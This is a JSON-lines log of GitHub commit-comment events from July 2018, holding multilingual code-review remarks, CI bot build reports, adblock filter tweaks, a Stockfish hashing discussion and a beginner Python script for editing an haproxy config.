{"id":"7967313424","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29712762,"position":null,"line":null,"path":null,"commit_id":"8d10b1acddbcaafba8bdb1f833c2973c4f19b346","created_at":"2018-07-15T12:44:52Z","updated_at":"2018-07-15T12:44:52Z","author_association":"MEMBER","body":"2 теста падают! Это залет!"}},"created_at":"2018-07-15T12:44:52Z"}
{"id":"7967314700","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29712767,"position":45,"line":45,"path":"Dodo.RestaurantBoard.Site.Tests/BoardsControllerShould.cs","commit_id":"8d10b1acddbcaafba8bdb1f833c2973c4f19b346","created_at":"2018-07-15T12:45:46Z","updated_at":"2018-07-15T12:45:46Z","author_association":"MEMBER","body":"Ужасно длинный Arrange. \r\nУберите из теста все, что неважно для теста.\r\nНапример Country"}},"created_at":"2018-07-15T12:45:46Z"}
{"id":"7967316712","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29712768,"position":45,"line":45,"path":"Dodo.RestaurantBoard.Site.Tests/BoardsControllerShould.cs","commit_id":"8d10b1acddbcaafba8bdb1f833c2973c4f19b346","created_at":"2018-07-15T12:47:21Z","updated_at":"2018-07-15T12:47:21Z","author_association":"MEMBER","body":"Тем более что и без Country тест прекрасно ходит"}},"created_at":"2018-07-15T12:47:21Z"}
{"id":"7967318935","type":"CommitCommentEvent","actor":{"login":"zs5978"},"repo":{"name":"hhcaz/hello-world"},"payload":{"comment":{"id":29712773,"position":null,"line":null,"path":null,"commit_id":"8505073f15717c57baf0e266e89c762e745676a1","created_at":"2018-07-15T12:49:08Z","updated_at":"2018-07-15T12:49:08Z","author_association":"NONE","body":"tql"}},"created_at":"2018-07-15T12:49:08Z"}
{"id":"7967319724","type":"CommitCommentEvent","actor":{"login":"koguzhan"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29712775,"position":4,"line":132,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"5a3276ea242fd8fb10d3a1d8373598f660c058e1","created_at":"2018-07-15T12:49:47Z","updated_at":"2018-07-15T12:49:47Z","author_association":"COLLABORATOR","body":"Bidixte bunlar hep adv-itg idi baştan beri, ondan böyle yaptım. Prn-itg de mi yapalım hepsini?"}},"created_at":"2018-07-15T12:49:47Z"}
{"id":"7967323614","type":"CommitCommentEvent","actor":{"login":"ryanliew"},"repo":{"name":"ryanliew/parcelhub-pos-laravel"},"payload":{"comment":{"id":29712781,"position":26,"line":218,"path":"app/Http/Controllers/InvoiceController.php","commit_id":"10ab12953f728c0d9c52df78e40ac24bec3bbbbc","created_at":"2018-07-15T12:52:43Z","updated_at":"2018-07-15T12:52:43Z","author_association":"OWNER","body":"Can do $this->generate_pdf instead"}},"created_at":"2018-07-15T12:52:43Z"}
{"id":"7967324751","type":"CommitCommentEvent","actor":{"login":"ryanliew"},"repo":{"name":"ryanliew/parcelhub-pos-laravel"},"payload":{"comment":{"id":29712782,"position":5,"line":24,"path":"resources/assets/js/components/customers/Dialog.vue","commit_id":"10ab12953f728c0d9c52df78e40ac24bec3bbbbc","created_at":"2018-07-15T12:53:33Z","updated_at":"2018-07-15T12:53:33Z","author_association":"OWNER","body":"maybe use v-if=\"data.is_admin\" to hide the selector completely will be better"}},"created_at":"2018-07-15T12:53:33Z"}
{"id":"7967326296","type":"CommitCommentEvent","actor":{"login":"kaushikcfd"},"repo":{"name":"kaushikcfd/PyOP2"},"payload":{"comment":{"id":29712783,"position":17,"line":499,"path":"pyop2/petsc_base.py","commit_id":"04237d0ba4c4c8489b8ad6e71cd4cdaf6e568f53","created_at":"2018-07-15T12:54:42Z","updated_at":"2018-07-15T12:54:42Z","author_association":"OWNER","body":"Assumes only one GPU right now, will fix it. "}},"created_at":"2018-07-15T12:54:42Z"}
{"id":"7967326555","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29712784,"position":114,"line":114,"path":"Dodo.RestaurantBoard.Site.Tests/BoardsControllerShould.cs","commit_id":"8d10b1acddbcaafba8bdb1f833c2973c4f19b346","created_at":"2018-07-15T12:54:55Z","updated_at":"2018-07-15T12:54:55Z","author_association":"MEMBER","body":"Совершенно нечитаемый тест.\r\nНевозможно понять, что влияет на логику, а что нет."}},"created_at":"2018-07-15T12:54:55Z"}
{"id":"7967327231","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29712785,"position":null,"line":null,"path":null,"commit_id":"3d9f8454ba627505f373db5b6f6ab1ae283a5187","created_at":"2018-07-15T12:55:27Z","updated_at":"2018-07-15T12:55:27Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2320 of 2320 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3d9f8454ba627505f373db5b6f6ab1ae283a5187-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3d9f8454ba627505f373db5b6f6ab1ae283a5187-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3d9f8454ba627505f373db5b6f6ab1ae283a5187-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.19%25-green.png)</a>\n"}},"created_at":"2018-07-15T12:55:27Z"}
{"id":"7967328556","type":"CommitCommentEvent","actor":{"login":"krystian3w"},"repo":{"name":"PolishFiltersTeam/PolishSocialCookiesFiltersDev"},"payload":{"comment":{"id":29712786,"position":31,"line":726,"path":"adblock_social_filters/adblock_social_list.txt","commit_id":"4b081958c8e9a6990c416e95816c8e34a703770e","created_at":"2018-07-15T12:56:28Z","updated_at":"2018-07-15T12:56:28Z","author_association":"COLLABORATOR","body":"Znów ludzie będą narzekać, że im wycina coś przycisk polubienia artykułów.\r\n\r\nhttps://github.com/MajkiIT/polish-ads-filter/issues/8297"}},"created_at":"2018-07-15T12:56:28Z"}
{"id":"7967329102","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29712788,"position":null,"line":null,"path":null,"commit_id":"3d9f8454ba627505f373db5b6f6ab1ae283a5187","created_at":"2018-07-15T12:56:55Z","updated_at":"2018-07-15T12:56:55Z","author_association":"NONE","body":"issue-6829 (EnergyArchmage) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3d9f8454ba627505f373db5b6f6ab1ae283a5187-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-15T12:56:55Z"}
{"id":"7967330043","type":"CommitCommentEvent","actor":{"login":"KlepaczPrzemyslaw"},"repo":{"name":"KlepaczPrzemyslaw/Console-Task-Manager"},"payload":{"comment":{"id":29712789,"position":null,"line":null,"path":null,"commit_id":"5822cbbb3066078ea2bdde0db9715cf9253379ed","created_at":"2018-07-15T12:57:40Z","updated_at":"2018-07-15T12:57:40Z","author_association":"OWNER","body":"@pwasilewski-netcode\r\nGotowe zadanie z 1 tygodnia warsztatów."}},"created_at":"2018-07-15T12:57:40Z"}
{"id":"7967330993","type":"CommitCommentEvent","actor":{"login":"kaushikcfd"},"repo":{"name":"kaushikcfd/PyOP2"},"payload":{"comment":{"id":29712790,"position":17,"line":499,"path":"pyop2/petsc_base.py","commit_id":"04237d0ba4c4c8489b8ad6e71cd4cdaf6e568f53","created_at":"2018-07-15T12:58:23Z","updated_at":"2018-07-15T12:58:23Z","author_association":"OWNER","body":"Also has to do with the moment in the pipeline where the context of a kernel argument is entered, would need to make changes there too."}},"created_at":"2018-07-15T12:58:23Z"}
{"id":"7967331892","type":"CommitCommentEvent","actor":{"login":"Ariyapong"},"repo":{"name":"Ariyapong/Digital-Oscillator"},"payload":{"comment":{"id":29712791,"position":null,"line":null,"path":null,"commit_id":"f0b5dea51f0b76efbd67e43aca4fa894f068a2b3","created_at":"2018-07-15T12:59:04Z","updated_at":"2018-07-15T12:59:04Z","author_association":"OWNER","body":"awasome"}},"created_at":"2018-07-15T12:59:04Z"}
{"id":"7967334527","type":"CommitCommentEvent","actor":{"login":"hawkeye116477"},"repo":{"name":"PolishFiltersTeam/PolishSocialCookiesFiltersDev"},"payload":{"comment":{"id":29712799,"position":31,"line":726,"path":"adblock_social_filters/adblock_social_list.txt","commit_id":"4b081958c8e9a6990c416e95816c8e34a703770e","created_at":"2018-07-15T13:00:56Z","updated_at":"2018-07-15T13:00:56Z","author_association":"CONTRIBUTOR","body":"Ah, nie wiedziałem, że nawet coś takiego istnieje, dodałem to, by schować „udostępnij\" pod artykułem. W takim razie, trzeba będzie to zamienić na coś lepszego."}},"created_at":"2018-07-15T13:00:56Z"}
{"id":"7967336529","type":"CommitCommentEvent","actor":{"login":"cakoyo"},"repo":{"name":"Akarin-project/Akarin"},"payload":{"comment":{"id":29712807,"position":null,"line":null,"path":null,"commit_id":"ff00b7556e35db17f2d7dc7f61ccfedc98574ab2","created_at":"2018-07-15T13:02:20Z","updated_at":"2018-07-15T13:02:20Z","author_association":"MEMBER","body":"To clarify, this is a \"upstream\"."}},"created_at":"2018-07-15T13:02:20Z"}
{"id":"7967339203","type":"CommitCommentEvent","actor":{"login":"Richardlucas123"},"repo":{"name":"kubernetes/kubernetes"},"payload":{"comment":{"id":29712811,"position":13,"line":53,"path":"staging/src/k8s.io/apiserver/pkg/admission/config_test.go","commit_id":"1a552bbe149373c056ee004304d7e5abaa89f4c6","created_at":"2018-07-15T13:04:24Z","updated_at":"2018-07-15T13:04:24Z","author_association":"NONE","body":" `config\r\n`"}},"created_at":"2018-07-15T13:04:24Z"}
{"id":"7967339252","type":"CommitCommentEvent","actor":{"login":"Sheshadri-1992"},"repo":{"name":"Sheshadri-1992/LeetCode"},"payload":{"comment":{"id":29712812,"position":null,"line":null,"path":null,"commit_id":"39fc4e39ed4bfb1802cb5d02450f3c0a372d7d26","created_at":"2018-07-15T13:04:27Z","updated_at":"2018-07-15T13:04:27Z","author_association":"OWNER","body":"Looks fine, All nodes from distance K, need to handle more cases"}},"created_at":"2018-07-15T13:04:27Z"}
{"id":"7967340428","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":29712813,"position":null,"line":null,"path":null,"commit_id":"458284b68c6e123e5743f853487bbbdbfca6a68c","created_at":"2018-07-15T13:05:23Z","updated_at":"2018-07-15T13:05:23Z","author_association":"OWNER","body":"Hmm, this would only work if the same distinction would be made when computing the material hash key.\r\nExample:\r\n```\r\nposition fen rnbqkbn1/p6p/1pp2p2/8/8/2PP2P1/P6P/RNBQKBN1 w - - 0 1\r\nd\r\n\r\n +---+---+---+---+---+---+---+---+\r\n | r | n | b | q | k | b | n |   |\r\n +---+---+---+---+---+---+---+---+\r\n | p |   |   |   |   |   |   | p |\r\n +---+---+---+---+---+---+---+---+\r\n |   | p | p |   |   | p |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   |   |   |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   |   |   |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   | P | P |   |   | P |   |\r\n +---+---+---+---+---+---+---+---+\r\n | P |   |   |   |   |   |   | P |\r\n +---+---+---+---+---+---+---+---+\r\n | R | N | B | Q | K | B | N |   |\r\n +---+---+---+---+---+---+---+---+\r\n\r\nFen: rnbqkbn1/p6p/1pp2p2/8/8/2PP2P1/P6P/RNBQKBN1 w - - 0 1\r\nKey:         D00F635E22795C80\r\nMaterialKey: F96C21013D2AF9D8\r\nPawnKey:     F227E14BF4713114\r\nCheckers: \r\neval\r\n     Term    |     White     |     Black     |     Total    \r\n             |   MG     EG   |   MG     EG   |   MG     EG  \r\n ------------+---------------+---------------+--------------\r\n    Material |  32.35  35.65 |  32.33  35.65 |   0.02  -0.00\r\n   Imbalance |   0.00   0.00 |   0.00   0.00 |   0.00   0.00\r\n  Initiative |   ----   ---- |   ----   ---- |   0.00   0.06\r\n       Pawns |   0.28  -0.06 |   0.16  -0.12 |   0.12   0.06\r\n     Knights |  -0.10  -0.12 |  -0.10  -0.12 |   0.00   0.00\r\n     Bishops |  -0.07  -0.19 |  -0.06  -0.19 |  -0.01   0.00\r\n       Rooks |   0.00   0.00 |   0.00   0.00 |   0.00   0.00\r\n      Queens |   0.00   0.00 |   0.00   0.00 |   0.00   0.00\r\n    Mobility |   0.38   0.43 |   0.47   0.46 |  -0.10  -0.03\r\n King safety |  -1.10  -0.35 |  -0.30  -0.13 |  -0.80  -0.22\r\n     Threats |   0.07   0.14 |   0.05   0.02 |   0.02   0.12\r\n      Passed |   0.00   0.00 |   0.00   0.00 |   0.00   0.00\r\n       Space |   0.31   0.00 |   0.31   0.00 |   0.00   0.00\r\n ------------+---------------+---------------+--------------\r\n       Total |   ----   ---- |   ----   ---- |  -0.75   0.00\r\n\r\nTotal evaluation: -0.57 (white side)\r\n\r\nucinewgame\r\nisready\r\nreadyok\r\nposition fen rnbqk1n1/p6p/1pp2p2/3b4/8/2PP2P1/P6P/RNBQKBN1 w - - 0 1\r\nd\r\n\r\n +---+---+---+---+---+---+---+---+\r\n | r | n | b | q | k |   | n |   |\r\n +---+---+---+---+---+---+---+---+\r\n | p |   |   |   |   |   |   | p |\r\n +---+---+---+---+---+---+---+---+\r\n |   | p | p |   |   | p |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   | b |   |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   |   |   |   |   |   |   |\r\n +---+---+---+---+---+---+---+---+\r\n |   |   | P | P |   |   | P |   |\r\n +---+---+---+---+---+---+---+---+\r\n | P |   |   |   |   |   |   | P |\r\n +---+---+---+---+---+---+---+---+\r\n | R | N | B | Q | K | B | N |   |\r\n +---+---+---+---+---+---+---+---+\r\n\r\nFen: rnbqk1n1/p6p/1pp2p2/3b4/8/2PP2P1/P6P/RNBQKBN1 w - - 0 1\r\nKey:         99DD5690525E0C1B\r\nMaterialKey: F96C21013D2AF9D8\r\nPawnKey:     F227E14BF4713114\r\nCheckers: \r\neval\r\n     Term    |     White     |     Black     |     Total    \r\n             |   MG     EG   |   MG     EG   |   MG     EG  \r\n ------------+---------------+---------------+--------------\r\n    Material |  32.35  35.65 |  32.47  35.88 |  -0.12  -0.23\r\n   Imbalance |   0.00   0.00 |   0.00   0.00 |   0.00   0.00\r\n  Initiative |   ----   ---- |   ----   ---- |   0.00   0.21\r\n       Pawns |   0.28  -0.06 |   0.16  -0.12 |   0.12   0.06\r\n     Knights |  -0.10  -0.12 |  -0.10  -0.12 |   0.00   0.00\r\n     Bishops |  -0.07  -0.19 |  -0.01  -0.20 |  -0.07   0.02\r\n       Rooks |   0.00   0.00 |   0.00   0.00 |   0.00   0.00\r\n      Queens |   0.00   0.00 |   0.00   0.00 |   0.00   0.00\r\n    Mobility |   0.38   0.43 |   0.45   0.42 |  -0.07   0.01\r\n King safety |  -1.17  -0.36 |  -0.30  -0.13 |  -0.88  -0.23\r\n     Threats |   0.26   0.30 |   0.06   0.15 |   0.20   0.15\r\n      Passed |   0.00   0.00 |   0.00   0.00 |   0.00   0.00\r\n       Space |   0.31   0.00 |   0.31   0.00 |   0.00   0.00\r\n ------------+---------------+---------------+--------------\r\n       Total |   ----   ---- |   ----   ---- |  -0.82   0.00\r\n\r\nTotal evaluation: -0.64 (white side)\r\n```\r\nBoth positions get the same hash key assigned and the imbalance eval is looked up from the material hash instead of being recomputed."}},"created_at":"2018-07-15T13:05:23Z"}
{"id":"7967341526","type":"CommitCommentEvent","actor":{"login":"Utumno"},"repo":{"name":"wrye-bash/wrye-bash"},"payload":{"comment":{"id":29712814,"position":null,"line":null,"path":null,"commit_id":"9598a77032c6e56e35f3d70faab624c0bdf1b453","created_at":"2018-07-15T13:06:10Z","updated_at":"2018-07-15T13:06:10Z","author_association":"MEMBER","body":"@Sharlikran `__slots__` are inherited and it is a mistake to reinclude them in subclasses (that may also lead to very subtle bugs). I see in the records code this mistake all over. Could you correct this? So if one has:\r\n\r\n```\r\nclass DerivedClass(BaseClass):\r\n     ....\r\n-    __slots__ = BaseClass.__slots__\r\n+   __slots__ = []\r\n\r\n     # Or:\r\n-    __slots__ = BaseClass.__slots__ + SomeList\r\n+   __slots__ = SomeList\r\n```\r\n\r\nI added comments in brec etc in this commit but don't add them to record files - too much noise\r\n"}},"created_at":"2018-07-15T13:06:10Z"}
{"id":"7967342912","type":"CommitCommentEvent","actor":{"login":"Astridxx"},"repo":{"name":"kuntao-development/android_device_lenovo_kuntao"},"payload":{"comment":{"id":29712816,"position":null,"line":null,"path":null,"commit_id":"42adafaf4d7cfcb921cd77c2b025e7b3b0542672","created_at":"2018-07-15T13:07:15Z","updated_at":"2018-07-15T13:07:15Z","author_association":"CONTRIBUTOR","body":"@redking12 Check 2 times"}},"created_at":"2018-07-15T13:07:15Z"}
{"id":"7967343195","type":"CommitCommentEvent","actor":{"login":"isisiranatha"},"repo":{"name":"isisiranatha/HotelRoomBooking"},"payload":{"comment":{"id":29712818,"position":null,"line":null,"path":null,"commit_id":"7ea60dc0bfd3c3c1ede22065dfe74769737040a0","created_at":"2018-07-15T13:07:28Z","updated_at":"2018-07-15T13:07:28Z","author_association":"OWNER","body":"ASP.NET Core, Angular 5, SQL Server 17, Dependency Injection, Web API, MVC"}},"created_at":"2018-07-15T13:07:28Z"}
{"id":"7967344304","type":"CommitCommentEvent","actor":{"login":"krystian3w"},"repo":{"name":"PolishFiltersTeam/PolishSocialCookiesFiltersDev"},"payload":{"comment":{"id":29712821,"position":31,"line":726,"path":"adblock_social_filters/adblock_social_list.txt","commit_id":"4b081958c8e9a6990c416e95816c8e34a703770e","created_at":"2018-07-15T13:08:18Z","updated_at":"2018-07-15T13:08:18Z","author_association":"COLLABORATOR","body":"```\r\ndobreprogramy.pl#@#.social\r\ndobreprogramy.pl##.span-8 > .social\r\ndobreprogramy.pl##.content.float-right > .social\r\n```\r\n\r\nchyba dobre."}},"created_at":"2018-07-15T13:08:18Z"}
{"id":"7967344343","type":"CommitCommentEvent","actor":{"login":"caco3"},"repo":{"name":"Ryan-Myers/canon-selphy-print"},"payload":{"comment":{"id":29712822,"position":null,"line":null,"path":null,"commit_id":"c469bc2b4a2f0001a290cb4ff7cb9cd832244685","created_at":"2018-07-15T13:08:19Z","updated_at":"2018-07-15T13:08:19Z","author_association":"NONE","body":"Finally it worked out :)\r\nThank you very much!\r\nI am now able to print borderless using the latest gutenprint dev driver and the selphy script.\r\nI extended your instructions a bit and created a merge request https://github.com/Ryan-Myers/Photobooth/pull/1\r\n"}},"created_at":"2018-07-15T13:08:19Z"}
{"id":"7967345714","type":"CommitCommentEvent","actor":{"login":"buihoan"},"repo":{"name":"buihoan/testgit"},"payload":{"comment":{"id":29712823,"position":6,"line":13,"path":"a.js","commit_id":"344d0ebd4c1dd41813e893ba97398815535977ab","created_at":"2018-07-15T13:09:26Z","updated_at":"2018-07-15T13:09:26Z","author_association":"OWNER","body":"n"}},"created_at":"2018-07-15T13:09:26Z"}
{"id":"7967345760","type":"CommitCommentEvent","actor":{"login":"downtiser"},"repo":{"name":"downtiser/python-one"},"payload":{"comment":{"id":29712824,"position":null,"line":null,"path":null,"commit_id":"357df184ea7e59907ee15d6e40debb4d4b03c1d0","created_at":"2018-07-15T13:09:29Z","updated_at":"2018-07-15T13:09:29Z","author_association":"OWNER","body":"```\r\n#Downtiser\r\n\r\nopration=['search','add','delete']\r\n\r\n\r\n\r\ndef search(search_choice):\r\n    '''搜索文件中是否存在参数值，如果存在，返回具体信息，如果不存在，则报错'''\r\n    f_search=open('haproxy','r',encoding='utf-8')\r\n    res=f_search.read()\r\n    f_search.seek(0)\r\n    if search_choice in res:\r\n        for line in f_search:\r\n            if line.strip()=='bakend %s'%search_choice:\r\n                print(line.strip())\r\n                a=f_search.readline()\r\n                print(a.rstrip())\r\n    else:\r\n        print('record dose not exsit,please input again,or input b or q to leave:')\r\n\r\n    f_search.close()\r\n\r\n\r\ndef add(kwargs):\r\n    '''往文件中追加新内容，如果已经存在，则报错，'''\r\n    f_add=open('haproxy','a+',encoding='utf-8')\r\n    f_add.seek(0)\r\n    res=f_add.read()\r\n\r\n    if kwargs['bakend'] in res:\r\n        print('the record has existed,please input again:')\r\n    else:\r\n        print('successfully write in!')\r\n        f_add.write('\\nbakend %s'%kwargs['bakend'])\r\n        f_add.write('\\n\\t\\tserver: %s '%kwargs['record']['server'])\r\n        f_add.write('weight %s '%kwargs['record']['weight'])\r\n        f_add.write('maxconn %s'%kwargs['record']['maxconn'])\r\n    f_add.close()\r\ndef delete(delete_choice):\r\n    '''删除文件内容，如果内容不存在，则报错'''\r\n    f_old=open('haproxy','r',encoding='utf-8')\r\n    res=f_old.read()\r\n    f_old.seek(0)\r\n    if delete_choice['bakend'] not in res:\r\n        print('The record does not exist,needless to delete,input again!')\r\n        f_old.close()\r\n    else:\r\n        f_new=open('new','w+',encoding='utf-8')\r\n        for line_old in f_old:\r\n            if line_old.strip()=='bakend %s'%delete_choice['bakend']:\r\n                f_old.readline()\r\n                continue\r\n            f_new.write(line_old)\r\n        f_new.close()\r\n        f_old.close()\r\n        f_old2=open('haproxy','w+',encoding='utf-8')\r\n        f_new2=open('new','r',encoding='utf-8')\r\n        for line_new in f_new2:\r\n            f_old2.write(line_new)\r\n        f_old2.close()\r\n        f_new2.close()\r\n        print('delete successfully!')\r\n\r\nwhile True:\r\n    for i,item in enumerate(opration):\r\n        print(i+1,item)\r\n    user_choice=input('please input your option:')\r\n    if user_choice in opration:\r\n        if user_choice=='search':\r\n            user_search='None'\r\n            while user_search!='b' and user_search!='q':\r\n                user_search = input('please input a url(or b to back,q to quit):')\r\n                search(user_search)\r\n            else:\r\n                if user_search=='q':\r\n                    print('quit successfully!')\r\n                    exit()\r\n                else:\r\n                    continue\r\n        elif user_choice=='add':\r\n            user_add=eval(input('please input the addition:'))\r\n            add(user_add)\r\n\r\n\r\n        else:\r\n            user_delete=eval(input('please input what need to be deleted:'))\r\n            delete(user_delete)\r\n\r\n\r\n    elif user_choice=='q':\r\n        break\r\n    else:\r\n        print('wrong input!')\r\n        continue\r\n```"}},"created_at":"2018-07-15T13:09:29Z"}
{"id":"7967345974","type":"CommitCommentEvent","actor":{"login":"buihoan"},"repo":{"name":"buihoan/testgit"},"payload":{"comment":{"id":29712826,"position":7,"line":14,"path":"a.js","commit_id":"344d0ebd4c1dd41813e893ba97398815535977ab","created_at":"2018-07-15T13:09:39Z","updated_at":"2018-07-15T13:09:39Z","author_association":"OWNER","body":"k"}},"created_at":"2018-07-15T13:09:39Z"}
{"id":"7967346871","type":"CommitCommentEvent","actor":{"login":"ied206"},"repo":{"name":"pebakery/pebakery"},"payload":{"comment":{"id":29712827,"position":null,"line":null,"path":null,"commit_id":"b5a29f2b485d776f3352860be88112895fc47db3","created_at":"2018-07-15T13:10:21Z","updated_at":"2018-07-15T13:10:21Z","author_association":"MEMBER","body":"Reference also #71, along with #70"}},"created_at":"2018-07-15T13:10:21Z"}
{"id":"7967348829","type":"CommitCommentEvent","actor":{"login":"RJVB"},"repo":{"name":"macports/macports-ports"},"payload":{"comment":{"id":29712828,"position":null,"line":null,"path":null,"commit_id":"4cbfada53cedc09c44678afb345e43eacbab275e","created_at":"2018-07-15T13:11:57Z","updated_at":"2018-07-15T13:11:57Z","author_association":"CONTRIBUTOR","body":"See , sure. But too short in my book to force people to upgrade “base” (esp. since no port appears to be using this new (and undocumented) feature and it’s trivial to implement this change in a backwards-compatible way.\n\nSent from a pocket terminal\n\n> On 15 Jul 2018, at 12:41, Ryan Schmidt <notifications@github.com> wrote:\n> \n> depends_patch was part of MacPorts 2.5.0 released May 28. I made the change on June 22. That should have been enough time for everyone to see the \"it's been 2 weeks since you last ran selfupdate\" message.\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-15T13:11:57Z"}
{"id":"7967353389","type":"CommitCommentEvent","actor":{"login":"alirezaxcs"},"repo":{"name":"alirezaxcs/okbax"},"payload":{"comment":{"id":29712839,"position":null,"line":null,"path":null,"commit_id":"21e067667eb73e73aae3ecc40e9aa9a1194b218a","created_at":"2018-07-15T13:15:39Z","updated_at":"2018-07-15T13:15:39Z","author_association":"OWNER","body":"sad"}},"created_at":"2018-07-15T13:15:39Z"}
{"id":"7967355657","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"Piyush3079/phpmyadmin"},"payload":{"comment":{"id":29712841,"position":null,"line":null,"path":null,"commit_id":"4c7f2df5b30d79037d546117108eb9525add030a","created_at":"2018-07-15T13:17:26Z","updated_at":"2018-07-15T13:17:26Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: js/src/messages.php"}},"created_at":"2018-07-15T13:17:26Z"}
{"id":"7967356108","type":"CommitCommentEvent","actor":{"login":"Mars1031"},"repo":{"name":"JoyBeginner/PointsAccumulated"},"payload":{"comment":{"id":29712842,"position":null,"line":null,"path":null,"commit_id":"802d67a7141d33c75f50bb645a97c38d71542beb","created_at":"2018-07-15T13:17:47Z","updated_at":"2018-07-15T13:17:47Z","author_association":"COLLABORATOR","body":"-zhaowenshen_0715 \r\n-- 学习任务  ：ssm+dubbo+zookeeper整合\r\n-- 路线记录 ： https://blog.csdn.net/liaodehong/article/details/52634911\r\n                        https://blog.csdn.net/weixin_37068368/article/details/79949652\r\n  "}},"created_at":"2018-07-15T13:17:47Z"}
{"id":"7967357781","type":"CommitCommentEvent","actor":{"login":"the-nic"},"repo":{"name":"abraunegg/onedrive"},"payload":{"comment":{"id":29712845,"position":6,"line":31,"path":"Makefile","commit_id":"6fb0cee16dfd7bb4a7686162b7bb3cbdcf0a8162","created_at":"2018-07-15T13:19:08Z","updated_at":"2018-07-15T13:19:08Z","author_association":"NONE","body":"shouldn't that be a colon here, ie `chown root:root`?"}},"created_at":"2018-07-15T13:19:08Z"}
{"id":"7967359072","type":"CommitCommentEvent","actor":{"login":"fanshuaiko"},"repo":{"name":"fanshuaiko/CS"},"payload":{"comment":{"id":29712849,"position":null,"line":null,"path":null,"commit_id":"4030a37b94f1f4d0063aaa6f4cd708d90b351990","created_at":"2018-07-15T13:20:09Z","updated_at":"2018-07-15T13:20:09Z","author_association":"OWNER","body":"登录异常处理类"}},"created_at":"2018-07-15T13:20:09Z"}
{"id":"7967360253","type":"CommitCommentEvent","actor":{"login":"mwojtkowski"},"repo":{"name":"mwojtkowski/Ovale"},"payload":{"comment":{"id":29712850,"position":null,"line":null,"path":null,"commit_id":"9924643cb4a507f1dfbfa402d46ca46797405454","created_at":"2018-07-15T13:20:59Z","updated_at":"2018-07-15T13:20:59Z","author_association":"OWNER","body":"Ok, I reverted changes to Health and Frame. I've made mistake when I was making that refresh condition the idea was to disable or lower refresh out of combat (because why would you need it to refresh every 0.05 when you're posting auctions on AH )\r\n\r\n<pre>\r\nlet guid = OvaleGUID.UnitGUID(\"target\") || OvaleGUID.UnitGUID(\"focus\");\r\nif (guid) {\r\n    Ovale.refreshNeeded[guid] = true;\r\n}\r\nthis.timeSinceLastUpdate = this.timeSinceLastUpdate + elapsed;\r\n<b>let refresh = OvaleDebug.trace || this.timeSinceLastUpdate > Ovale.db.profile.apparence.minFrameRefresh / 1000 && next(Ovale.refreshNeeded) || guid && this.timeSinceLastUpdate > Ovale.db.profile.apparence.maxFrameRefresh / 1000;</b>\r\n</pre>\r\nthis is what you have changed but isn't it always 0.05 ? If you have target it will push guid into refreshNeeded table and then next(Ovale.refreshNeeded) will return true so is it will force refresh every 0.05 when you have target even out of combat\r\n\r\nwouldn't this be better ? ```if (guid && baseState.current.inCombat)``` this will force minFrameRefresh when in combat but will use maxFrameRefresh outside of combat when targeting\r\n"}},"created_at":"2018-07-15T13:20:59Z"}
{"id":"7967360841","type":"CommitCommentEvent","actor":{"login":"chebaum"},"repo":{"name":"Smartudy/smartudy"},"payload":{"comment":{"id":29712851,"position":null,"line":null,"path":null,"commit_id":"21907f93ad9850479154bdd23a42a5cfd264f1c0","created_at":"2018-07-15T13:21:24Z","updated_at":"2018-07-15T13:21:24Z","author_association":"COLLABORATOR","body":"흐 고생했구려ㅜㅜ"}},"created_at":"2018-07-15T13:21:24Z"}
